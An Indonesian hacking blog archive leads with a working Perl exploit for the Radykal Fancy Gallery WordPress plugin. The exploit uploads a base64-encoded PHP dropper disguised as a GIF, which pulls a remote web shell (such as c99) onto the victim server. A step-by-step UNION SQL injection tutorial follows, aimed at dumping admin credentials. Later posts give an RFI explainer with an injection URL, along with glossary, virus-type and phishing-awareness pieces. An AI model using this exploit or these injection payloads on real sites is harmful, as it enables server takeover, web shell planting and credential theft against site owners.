Tampilkan postingan dengan label Security. Tampilkan semua postingan
Tampilkan postingan dengan label Security. Tampilkan semua postingan

Senin, 16 Juli 2012

[PERL] Exploit Radykal Fancy Gallery

#!/usr/bin/perl

print "################################################################\n";
print "                Radykal Fancy Gallery Exploit\n";
print " Author   : Jefry AnasKi\n";
print " Contact  : jefry@anaski.net\n";
print " Homepage : www.anaski.net | blog.anaski.net\n";
print " Thank to :\n";
print "             BlueBoyz, AnasKi CreW, ExploreCrew\n";
print "################################################################\n";

use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;                          
use LWP 5.64;
use LWP::UserAgent;
use Socket;                                  
use IO::Socket;                              
use IO::Socket::INET;                      
use IO::Select;   
use MIME::Base64;
use Cwd 'abs_path';
system 'clear';
system 'cls';

print "\r\nmasukan url target \r\n";
print "ex : http://blog.anaski.net/\r\n";
print "==> ";
my $web = <STDIN>;
chop($web);
my $url = $web."/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php";
my $path = abs_path($0);
my $shell = "R0lGODlhAT8BPz8/P////yH5BAE/Pz8/LD8/Pz8BPwE/PwICRAE/Oz88P3BocA0KICAgICAgICAgICAgJHNoeCA9IEAkX0dFVFsidXJsIl07DQoJCQlAY29weSgiJHNoeCIsIm15c2hlbGwucGhwIik7DQoJaWYgKEAkX0dFVFsnYWN0J109PSAnZGVsJyl7ICAgDQogICAgICAgIGlmICh1bmxpbmsoX19GSUxFX18pKSB7IEBvYl9jbGVhbigpOyBlY2hvICI8YnIvPkpGcnlfIFdhcyBIZXJlISI7IH0NCiAgICAgICAgZWxzZSB7IGVjaG8gIjxjZW50ZXI+PGI+Q2FuJ3QgZGVsZXRlICIuX19GSUxFX18uIiE8L2I+PC9jZW50ZXI+IjsgfQ0KICB9DQo/Pg";
my $sh = decode_base64($shell);
open (code, '>exp.php');
print code $sh;
close (code);

my     $ua = LWP::UserAgent->new;
    $ua->agent("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54)");
my $get = $ua->post ($url, "Content" => ["file[]" => ["exp.php"]],'Content_Type' => 'form-data')->as_string;
    $ua->timeout(7);

if ($get =~ /error":0/ ) {
    print "\r\nmasukan url shell \r\n";
    print "ex : http://anaski.net/tool/c99.txt\r\n";
    print "==> ";

    my $hasil = <STDIN>;
    chop($hasil);
    my ($urlx) = ($get =~ /realFile":"(.*)"}/);
    my ($exp) = ($url =~ /(.*)image-upload.php/);
    &openweb($exp.$urlx."?&url=".$hasil);
    &openweb($exp.$urlx."?&act=del");
    print "\r\nhasil ==> ".$exp."/myshell.php\r\n";
  
} elsif ($get =~ /"error":1/ ){
    print "File exp.php is not an image";
} else {
    print "Silahkan Cari Target Lain";
}



sub openweb() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}
 
refrensi : http://forum.explorecrew.org/index.php?topic=1166.0

Minggu, 12 Juni 2011

SQL Injection Manual

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
step Satu
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
step Dua
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
step Tiga
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
step Empat
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
Step Lima
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
Step Enam
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
Step Tujuh
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
Step Delapan
==============

tahap terakhir mencari halam admin atau login . biasanya saya disni memkai adminfinder

Sumber : http://www.hn-team.co.cc/2009/10/my-sql.html
Thank to Up aka Deden Ramadhan GobeL

Beberpa istilah di dalam Hacking

SQL Injection

  • injeksi kode teknik yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL
DDOS [ Distributed Denial of Service ]

  • serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim, spt bandwith, memory, dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar, biasanya menggunakan bot pd irc atau pakai sesuatu tool.
Bug


Patch
  • adalah tambalan dalam bentuk source code, jadi yang ditambal itu bukan binarynya tapi source codenya. Ini berbeda dengan istilah Service Pack di sistem operasi lain yang bukan merupakan sebuah patch atau tambalan, karena Service Pack itu mengganti binary dengan binary yang baru yang mempunyai feature baru dan atau menutupi bug di binary yang lama.

Vurnerable
  • sebuah system yg mempunyai suatu kelemahan yg mudah untuk di serang
Shell

  • adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.

Deface
  • adalah merubah tampilan web orang dg paksa dengan mengganti index halaman pada suatu website.

Debug
  • sebuah metode yang dilakukan oleh para pemrogram dan pengembang perangkat lunak untuk meng-analisa alur kerja program, mencari dan mengurangi bug, atau kerusakan di dalam sebuah program komputer atau perangkat keras sehingga perangkat tersebut bekerja sesuai dengan harapan. Debugging cenderung lebih rumit ketika beberapa subsistem lainnya terikat dengan ketat dengannya, mengingat sebuah perubahan di satu sisi, mungkin dapat menyebabkan munculnya bug lain di dalam subsistem lainnya.
XSS
  • adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising

  • adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal dalam bentuk sebuah web alias pemalsuan.

Keylogger

  • adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata dalam artian katak spy )

Jumat, 11 Maret 2011

JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba 
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.
contoh virus:

-variant W97M, misal W97M.Panther
panjang 1234 bytes,
akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW
panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau menggantikan boot sector asli dengan program
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
selain drive c).
contoh virus :

-varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
panjang :520 bytes;
karakteristik : memory resident dan terenkripsi)
-varian V-sign :
menginfeksi : Master boot record ;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!:
menginfeksi : Master boot record dan floopy;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,
menginfeksi file *.COM dan *.EXE ;
panjang 4298 bytes;
karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy an motherboot record;
panjang 520 bytes;
menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s):
menginfeksi file file *.EXE, *.SYS, dan *.COM ;
panjang fie 3275 bytes;
karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,
menginfeksi file *.EXE dan *.COM;
panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur
-Nightfall,
menginfeksi file *.EXE;
panjang file 4554 bytes;
karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
terenkripsidan dapat berubah-ubah struktur
-dll


5.Virus File/Program
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


6.Multi Partition Virus
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.

ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan   " teori self altering automata "
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
program yang dapat memperbanyak dirinya dan dapat menghancurkan program
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.

1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

Selasa, 28 Desember 2010

Mencegah virus masuk dari Flashdisk dengan Local Security Setting

Portable Executable format (singkat:PE) adalah kode objek dan DLL, digunakan dalam 32-bit dan versi 64-bit dari sistem operasi Windows. Istilah "portable" mengacu pada fleksibilitas format dalam berbagai lingkungan operasi arsitektur sistem perangkat lunak. Portable Executable format adalah struktur data yang dilengkapi semua informasi yang diperlukan untuk loader OS Windows untuk mengelola kode dieksekusi dibungkus dalam satu/beberapa file.

Apakah Portable Executable format yang sering digunakan? Untuk system operasi windows yang cukup sering terkenal adalah diantaranya: EXE, COM, BAT, SCR, DLL, SYS, dan baru-baru ini telah ditemukan bug pada Microsoft yaitu Excute file melalui LNK dan PIF

Setelah sobat tau apa-apa file yang menyebabkan program terexcute/jalan ke System Windows sobat sekarang kita membuat rule atau aturan, misal Flaskdisk sobat berada pada Drive F:\ maka sobat bisa membuat rule seperti ini:

* F:\*.EXE
* F:\*.COM
* F:\*.BAT
* F:\*.SCR
* F:\*.DLL
* F:\*.SYS
* F:\*.LNK
* F:\*.PIF

Aturan atau rule telah kita buat gimana caranya agar file tersebut tidak bisa jalan jika berada didalam Flashdisk.

Sabtu, 18 Desember 2010

Hacker Facebook Cup

Berikut Pesan dari facebook developer yang sudah saya terjemahkan ke google translate :D

The Fine Print
Kompetisi dimulai dengan Babak Kualifikasi 72-jam pada tanggal 7 Januari 2011 00:00 UTC (16:00 PST) sampai dengan 10 Januari 2011 00:00 UTC (16:00 PST). Semua pesaing mendaftar yang akan disajikan dengan tiga masalah. Hanya pesaing yang benar memecahkan minimal 1 masalah akan maju untuk Online Round 1.

Online Round 1 terdiri dari 3 sub-putaran, masing-masing berlangsung 3 jam dalam panjang yang berbeda ditawarkan di timesfrom 15 Januari 2011 pukul 15:00 UTC (07:00 PST) dengan tanggal 16 Januari 2011 00:00 UTC (Januari 15, 2011 -. 16:00 PST) Pesaing yang maju ke putaran ini dapat berpartisipasi dalam salah satu dari tiga sub-putaran sampai mereka memenuhi syarat untuk Online Round 2. The top-skor 1.000 pesaing dari masing-masing tiga putaran sub akan maju untuk Online Round 2.

Round Online 2begins 22 Januari 2011 pukul 15:00 UTC (07:00 PST) dan akan berakhir pada 22 Januari 2011 18:00 UTC (10:00 PT). Para 3.000 pesaing akan memiliki tiga jam untuk menyelesaikan disajikan set masalah. 300 top-skor peserta dari Online Round 2 akan menerima Hacker resmi Piala t-shirt. 25 top-skor pesaing dari Online Round 2 akan diberitahu melalui email bahwa mereka telah maju ke babak final di dapat.

Facebook akan terbang 25 top-skor pesaing ke Palo Alto, California, untuk putaran final kompetisi pada tanggal 11 Maret 2011, di mana mereka akan menerima beberapa hadiah uang tunai yang besar dan mengagumkan Goodies lainnya. Dari 25 finalis ini, salah satu juara akan muncul dan diabadikan pada trofi Piala Hacker.

Mengawasi pada halaman Piala Hacker di www.facebook.com / hackercup untuk pengumuman lebih sebagai pendekatan babak kualifikasi 7 Januari.

Semoga hacker terbaik yang menang!

Hacking Facebook


Sumber Facebook developer

Kamis, 14 Oktober 2010

Mengatasi Hacking Facebook

Teknik-teknik yg umum digunakan para hacker/cracker untuk menghack facebook adalah Soceng (Social Engineering) dan Phissing. Salah satunya dengan menggunakan Fake Login (Halaman Login Palsu).


Bagaimana cara kerja Fake Login ini?

User akan dibujuk, dirayu, atau ditipu untuk membuka suatu halaman situs yg menyerupai halaman login pada Facebook. Halaman login palsu (Fake Login) tersebut diberi tugas untuk menyimpan informasi penting yaitu email dan password ke dalam sebuah file log. Kemudian halaman tsb mengarahkan browser ke situs asli Facebook sehingga user tidak menyadari bahwa dirinya telah memberikan alamat email dan password yg digunakan untuk login ke Facebook kepada orang lain.


Bagaimana menghindarinya?

Selain dg login ke Facebook benar-benar menggunakan alamat asli Facebook yaitu http://www.facebook.com/
Juga logout setelah login Facebook dan Hati2 Sama Keyloger dll

Sumber :
FeelCoMz CoMMuniTy
By RoNz

Jumat, 19 Maret 2010

Remote File Include (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses
file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi')
bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri
dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. "/file…")
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya
terdapat variabel seperti ini:


include($my_ms["root"].'/error.php');


Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
-------------

File inclusion memiliki level resiko tinggi (High Risk) bahkan level
sangat berbahaya (Very Dangerous) karena injeksi memperkenankan
pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server. Tindakan ini sangat membahayakan
bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses
lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa
saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information,
credit cards, etc..)
5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan
ddos!

° SISTEM OPERASI APA YANG KEBAL?
------------------------------

Saya teringat permainan C&C Generals (my fave game!) saat seorang
hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!".
Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi
selama mereka menggunakan server side scripting yang dapat
dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,
FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
-------------------------

Banyak sekali portal dan komunitas white hat yang sering merilis bugs
terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan
perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit
perbaikan yang berarti terhadap CMS yang mungkin sekarang anda
gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan
hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET
/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu
memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Gunakan firewall guna mencegah penyusupan orang-orang yang tidak
bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
------

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika
terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi
saya lewat email. Pengalaman adalah guru yang terbaik untuk kita
semua. Semua bisa saja terjadi karena tidak ada pribadi yang
diciptakan sempurna. Nobody is perfect! No systems is safe!

° REFERENSI
---------

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down... We love
streaming vids! Yeah!)
- http://kill-nines.blogspot.com